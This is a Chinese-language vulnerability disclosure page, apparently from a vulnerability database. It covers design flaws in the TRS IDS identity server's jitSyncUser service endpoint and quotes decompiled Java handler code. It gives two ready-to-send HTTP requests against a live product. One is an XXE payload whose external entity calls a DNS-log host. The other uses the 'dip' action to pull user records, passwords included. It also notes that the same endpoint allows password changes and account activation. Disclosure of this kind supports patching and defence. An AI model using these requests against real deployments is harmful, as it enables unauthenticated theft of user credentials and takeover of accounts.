|TRS(ids新老版本)设计缺陷(xxe/用户信息泄露包括密码等)

TRS(ids新老版本)设计缺陷(xxe/用户信息泄露包括密码等)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： TRS(ids)设计缺陷(xxe/用户信息泄露包括密码)，好久没有发过漏洞了，突然上来看了看，发现漏洞提交页面都变了 ### 详细说明：首先我们看看web.xml配置文件: ``` <servlet> <servlet-name>ServiceServlet</servlet-name> <servlet-class>com.trs.idm.admin.service.ServiceServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>ServiceServlet</servlet-name> <url-pattern>/service</url-pattern> </servlet-mapping> ``` 跟进ServiceServlet ``` protected void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { if("GET".equalsIgnoreCase(request.getMethod()) && StringHelper.isEmpty(request.getQueryString())) { String responMsg = "It works!"; if(serviceHandlerManager == null) responMsg = "It didn't work!"; response.getWriter().print(responMsg); response.getWriter().flush(); return; } String hanlderType = RequestUtil.getParameterAndTrim(request, "idsServiceType"); LOG.debug((new StringBuilder("hanlder type in request is: ")).append(hanlderType).toString()); if(serviceHandlerManager == null) { LOG.warn((new StringBuilder("serviceHandlerManager is null! ")).append(idmServer.getStartError()).toString()); if("remoteapi".equals(hanlderType)) { response.setContentType("text/xml;charset=utf-8"); setResponseType(request, response); String responseMsg = ProcessorHelper.getErrorResponseAsXML(-2, idmServer.getStartError().toString(), com/trs/idm/admin/service/ServiceServlet.getName(), null); sendResponse(response, responseMsg); } return; } IServiceHandler serviceHandler = serviceHandlerManager.getServiceHanlder(hanlderType); if(serviceHandler == null) { LOG.warn((new StringBuilder("can not find hanlder by type: ")).append(hanlderType).toString()); return; } else { serviceHandler.service(request, response); return; } } ``` 通过get方式获取一个服务的名称idsServiceType=xxxxx 然后这里去查询IServiceHandler serviceHandler = serviceHandlerManager.getServiceHanlder(hanlderType);服务存在否 ``` public IServiceHandler getServiceHanlder(String serviceHanlderName) { return (IServiceHandler)ServiceHanldersMap.get(serviceHanlderName); } public Map getAllServiceHanlders() { return ServiceHanldersMap; } public void start(IDSContext idsCtx) throws IdMException { IServiceHandler ssoAPIServiceHandler = new SSOAPIServiceHanlder(idsCtx); ssoAPIServiceHandler.start(); IServiceHandler coAppStatusMonitorServiceHanlder = new CoAppStatusMonitorServiceHanlder(idsCtx); coAppStatusMonitorServiceHanlder.start(); IServiceHandler v5httpHandler = new HTTPAPIAdaptorHandler(idsCtx); v5httpHandler.start(); IServiceHandler v5httpssoHandler = new HTTPSSOAPIHandler(idsCtx); v5httpssoHandler.start(); IServiceHandler realNameAuthServiceHandler = new RealNameAuthenticationServiceHandlerV2(idsCtx); realNameAuthServiceHandler.start(); IServiceHandler sinaWeiboLoginHandler = new SinaWeiboLoginServiceHandler(idsCtx); sinaWeiboLoginHandler.start(); IServiceHandler renrenLoginHandler = new RenRenLoginServiceHandler(idsCtx); renrenLoginHandler.start(); IServiceHandler qqLoginHandler = new QQLoginServiceHandler(idsCtx); qqLoginHandler.start(); IServiceHandler kaixinLoginHandler = new KaiXinLoginServiceHandler(idsCtx); kaixinLoginHandler.start(); IServiceHandler doubanLoginHandler = new DoubanLoginServiceHandler(idsCtx); doubanLoginHandler.start(); IServiceHandler openAuthLoginHandler = new OpenAuthLoginServiceHandler(idsCtx); openAuthLoginHandler.start(); IServiceHandler idsServerStatusMonitorServiceHanlder = new IdsServerStatusMonitorServiceHanlder(idsCtx); idsServerStatusMonitorServiceHanlder.start(); IServiceHandler federatedAuthHandler = new FederatedAuthHandler(idsCtx); federatedAuthHandler.start(); IServiceHandler jitSyncUser = new JitSynchUserServiceHandler(idsCtx); ServiceHanldersMap = new HashMap(); ServiceHanldersMap.put("remoteapi", v5httpHandler); ServiceHanldersMap.put("httpssoservice", v5httpssoHandler); ServiceHanldersMap.put("ssoapi", ssoAPIServiceHandler); ServiceHanldersMap.put("coAppStatusMonitor", coAppStatusMonitorServiceHanlder); ServiceHanldersMap.put("realNameAuthentication", realNameAuthServiceHandler); ServiceHanldersMap.put("idsStatusMonitor", idsServerStatusMonitorServiceHanlder); ServiceHanldersMap.put("jitSyncUser", jitSyncUser); ServiceHanldersMap.put("openAuthLogin", openAuthLoginHandler); ServiceHanldersMap.put("sinaWeiboLogin", sinaWeiboLoginHandler); ServiceHanldersMap.put("renrenLogin", renrenLoginHandler); ServiceHanldersMap.put("qqLogin", qqLoginHandler); ServiceHanldersMap.put("kaixinLogin", kaixinLoginHandler); ServiceHanldersMap.put("doubanLogin", doubanLoginHandler); ServiceHanldersMap.put("federatedAuth", federatedAuthHandler); ServiceHanldersMap.put("mockBabyTreeServer", new MockBabyTreeAppServer(idsCtx)); LOG.info("MemoryServiceHanlderManager start"); } ``` 发现了存在这么多服务，我们最主要的看jitSyncUser 这个服务跟进到JitSynchUserServiceHandler ``` public void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { request.setCharacterEncoding("UTF-8"); response.setContentType("text/html; charset=UTF-8"); response.setHeader("Pragma", "no-cache"); response.setHeader("Cache-Control", "no-store"); response.setDateHeader("Expires", -1L); InputStream in = request.getInputStream(); byte buf[] = new byte[2048]; in.read(buf); in.close(); String xml = (new String(buf, "UTF-8")).trim(); if(xml == null || xml.equals("")) { error(response, "XML\u6587\u6863\u4E3A\u7A7A"); return; } try { Document doc = DocumentHelper.parseText(xml); Element root = doc.getRootElement(); synchUser(response, root, xml); } catch(DocumentException e) { error(response, "XML\u6587\u6863\u9519\u8BEF"); } catch(Exception e) { error(response, "XML\u6587\u6863\u9519\u8BEF"); } } ``` 这里直接通过流读取一个xml，然后交给synchUser方法处理 ``` private void synchUser(HttpServletResponse response, Element element, String xml) throws IOException, IdMException { User user = getBean(element); String action = getAction(element); String status = ""; if("app".equalsIgnoreCase(action)) userManager.addUser(user, ""); else if("mod".equalsIgnoreCase(action)) userManager.updateUser(user); else if("active".equalsIgnoreCase(action)) { user.setActived(true); userService.noticeEnableOrDisableUser(true, user); } else if("unactive".equalsIgnoreCase(action)) { user.setActived(false); userService.noticeEnableOrDisableUser(false, user); } else if("del".equalsIgnoreCase(action)) userManager.removeUser(user); else if("dip".equalsIgnoreCase(action)) { User newUser = userManager.findByName(user.getUserName(), "ids_internal"); if(newUser != null) { String encode = buildReturnXml(newUser); response.getWriter().print(encode); return; } } else if("check".equalsIgnoreCase(action)) { String userExist = userManager.isUserExist(user.getUserName(), "", true); status = userExist; } else if("check-up".equalsIgnoreCase(action)) { status = checkUserInfo(user); } else { error(response, "\u8BF7\u6C42\u7684\u65B9\u6CD5\u65E0\u6548"); return; } StringBuffer sb = new StringBuffer("<?xml version='1.0' encoding='UTF-8' ?><Inter-Xinhua Version='1.0'>"); if("check".equals(action)) { if(status.equals("true") || status.equals("false")) sb.append(String.format("<Error>false</Error><Exist>%s</Exist>", new Object[] { status })); else sb.append(String.format("<Error>true</Error><ErrorMessage>%s</ErrorMessage>", new Object[] { status })); } else if(status.equals("")) sb.append("<Error>false</Error>"); else sb.append(String.format("<Error>true</Error><ErrorMessage>%s</ErrorMessage>", new Object[] { status })); sb.append("</Inter-Xinhua>"); response.getWriter().print(sb.toString()); } ``` 那么看看第一个漏洞点： ``` try { Document doc = DocumentHelper.parseText(xml); Element root = doc.getRootElement(); synchUser(response, root, xml); } ``` 这里直接对xml进行了解析，所以存在xxe漏洞，为了测试，我们cloudeye 演示一下 ``` POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1 Host: **.**.**.** User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.** X-Forwarded-For: **.**.**.** Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------1988224119974 Content-Length: 196 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE xdsec [<!ELEMENT methodname ANY ><!ENTITY xxe SYSTEM "http://mm1111.88d400.dnslog.info" >]><methodcall><methodname>&xxe;</methodname></methodcall> ``` [<img src="https://images.seebug.org/upload/201603/241025245f3ae8a58f15d4e940fcc373c979358d.gif" alt="trs1.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/241025245f3ae8a58f15d4e940fcc373c979358d.gif) 下面的synchUser,因为接口是统一有问题的，所以这里就举其中一个信息泄露例子吧 ``` POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1 Host: **.**.**.** User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.** X-Forwarded-For: **.**.**.** Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------1988224119974 Content-Length: 381 <?xml version="1.0" encoding="UTF-8"?><UserInfo><Method>dip</Method><AppId>dbg</AppId><ID>test</ID><Password>xxxxx</Password><CPassword>xxxxx</CPassword><Name>xxxxxx</Name><Domain></Domain><TEL>02965474561</TEL><PostCode>710000</PostCode><Mobile>15802991645</Mobile><Address>test123</Address><E-mail>test123@**.**.**.**</E-mail><UserType>dbg</UserType><ES></ES><DES></DES></UserInfo> ``` [<img src="https://images.seebug.org/upload/201603/24102712577de38796f9f2a9b1d8c55bb6360e5c.gif" alt="trs2.gif" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201603/24102712577de38796f9f2a9b1d8c55bb6360e5c.gif) 其他的比如任意用户密码修改，用户激活等等这里就不举例子了案例: **.**.**.** **.**.**.** **.**.**.** **.**.**.** **.**.**.** **.**.**.** ### 漏洞证明：

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™